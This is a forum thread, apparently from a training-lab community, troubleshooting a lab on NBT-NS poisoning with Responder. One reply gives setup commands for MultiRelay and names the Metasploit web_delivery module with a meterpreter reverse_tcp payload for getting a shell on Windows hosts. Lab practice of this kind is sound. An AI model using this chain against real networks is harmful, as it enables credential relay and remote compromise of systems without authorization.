NBT-NS Poisoning and Exploitation with Responder - Lab Problems

Hello all,

I have already tried many things, but I have problems in the Lab “NBT-NS Poisoning and Exploitation with Responder”.

For me simply the exploit does not work, I copy the Powershell command down but it does not work.
I also found this post: Lab 11 but it didn’t help me either.

Thanks a lot!

Picture of the Configuration:

Had a same problem, even tried generating own payload from revshells at-least got response as meterpreter reason died.

I also had a problem. Maybe your issue with Multirelay.py? (mine was)

Here’s what I did to fix on Kali:

purge python3.9
apt install -f -y
cd /usr/share
sudo apt-get install responder
cd responder/tools

To fix an error about needing python crypo:

sudo apt-get install python3-pip
sudo pip install pycrypto

To fix traceback error:

sudo pip install pycryptodomex
sudo apt-get install gcc-mingw-w64-x86-64

To fix multirelay/bin folder is empty:

sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv
sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode

By this point ./MultiRelay.py should be fully working.

With

use exploit/multi/script/web_delivery

make sure you do

set payload windows/x64/meterpreter/reverse_tcp

When you paste the command into your MultiRelay terminal/shell., you may initially see errors like: “write failed” / “sharing violation” but it shouldn’t matter; You should have a meterpreter session in your metasploit terminal now.

If you are still having issues, show all of your work from the beginning please.